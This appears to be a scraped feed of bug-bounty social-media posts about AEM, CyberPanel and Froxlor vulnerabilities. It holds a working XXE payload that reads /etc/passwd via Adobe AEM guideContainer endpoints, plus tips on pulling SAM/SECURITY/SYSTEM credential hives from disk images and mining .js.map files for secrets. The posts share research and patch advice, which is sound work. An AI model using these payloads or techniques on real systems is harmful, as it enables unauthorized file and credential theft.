AEMSecurity

[+] Linkedin XSS vulnerability affecting 40+ domains... youtu.be/VwLSUHNhrOw #AEMSecurity #bugbountytips

This interview was super fun, and @InsiderPhD was an amazing host. Here's a picture of the trophy we won - together the crown from @Bugcrowd's bug boss challenge!

@elonmusk Since past 3 weeks I have constantly been flagging TEMU ads as "I dont like it" and even clicked "Report ad" but guess what? Still after every 5 posts, I have to repeat the same routine. Can we fix this?

@ThisIsDK999 Bring it on bro!

@AEMSecurity Sure, I'll dm you!

AEM guideContainer XXE? guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<%3fxml+version%3d\"1.0\"+encoding%3d\"utf-8\"%3f><!DOCTYPE+afData+[<!ENTITY+a+SYSTEM+\"file%3a///etc/passwd\">]><afData>%26a%3b</afData>"}}} #AEMSecurity

@nullenc0de Yes!

@AEMSecurity Is this CVE-2019-8086?

@ThisIsDK999 I didn't get into cloud based instances! Share some and let me check? ;)

@AEMSecurity Any luck with cloud based instances? Because lot of them have moved away from on-prem ones.

[+] Little Achievement Update! I've discovered a new security vulnerability, CVE-2024-54679, in CyberPanel (aka Cyber Panel), a widely-used web hosting control panel powered by OpenLiteSpeed. CVE Identifier: CVE-2024-54679 Advisory: nvd.nist.gov/vuln/detail/CV…

Full advisory URL: github.com/froxlor/Froxlo…

[+] CVE-2024-34070 NXTL Solutions offensive security team is dedicated to securing cyberspace with advanced vulnerability research. Recently dicovered a critical Blind XSS vulnerability > Froxlor leading to potential app compromise. #Bugbountytips #NXTLSolutions #bugbountytip

@ThisIsDK999 Whoa!! bach kay rehna reh baba! haha! 😅😅

@AEMSecurity Reported a similar bug. Look what they had to say 😭🤣

[+] #BugbountyTip Take your time, Do Not Rush! Using GAU I found cached tokens lacking proper expiration. This misconfiguration resulted in unauthorized access to multiple user accounts! Need for secure token lifecycle management yeah? ;) #AEMSecurity #Bugbountytips

You can use the above payload by sending an HTTP POST request to guideContainer endpoints while hunting on Adobe AEM for bugs! #Bugbountytips #bugbounty

Giving back to the community is a core part of who we are. This month, our team hosted free #SecureCoding workshops for local developers, promoting safer code practices across the UAE. Together, we can raise the bar for security standards! #NXTLSolutions #CyberSecurity

Did you know that 7z can browse .VHD and .VMDK files? You can open them right up, and even directly browse ntfs filesystems. On a pentest and find a bunch of disk images? Copy the SAM/SECURITY/SYSTEM hives directly from the images, no mounting, copying, or fussing around.

Writeup and POC

A 0-click pre-auth RCE (root) exploit for LiteSpeed CyberPanel was released on 27th October and is being actively exploited. If anyone is still using version 2.3.6? immediately upgrade it to the latest version 2.3.7! #AEMSecurity #0day #Security

This report was completely unexpected for me! 😇 1. Bypass the login.microsoftonline.com gateway 2. Inspect *.js files and append *.js.map extension 4. Dump *.js.map files to find secrets or endpoints 5. Abuse the token in API request #bugbounty #bugbountytips #bugbountytip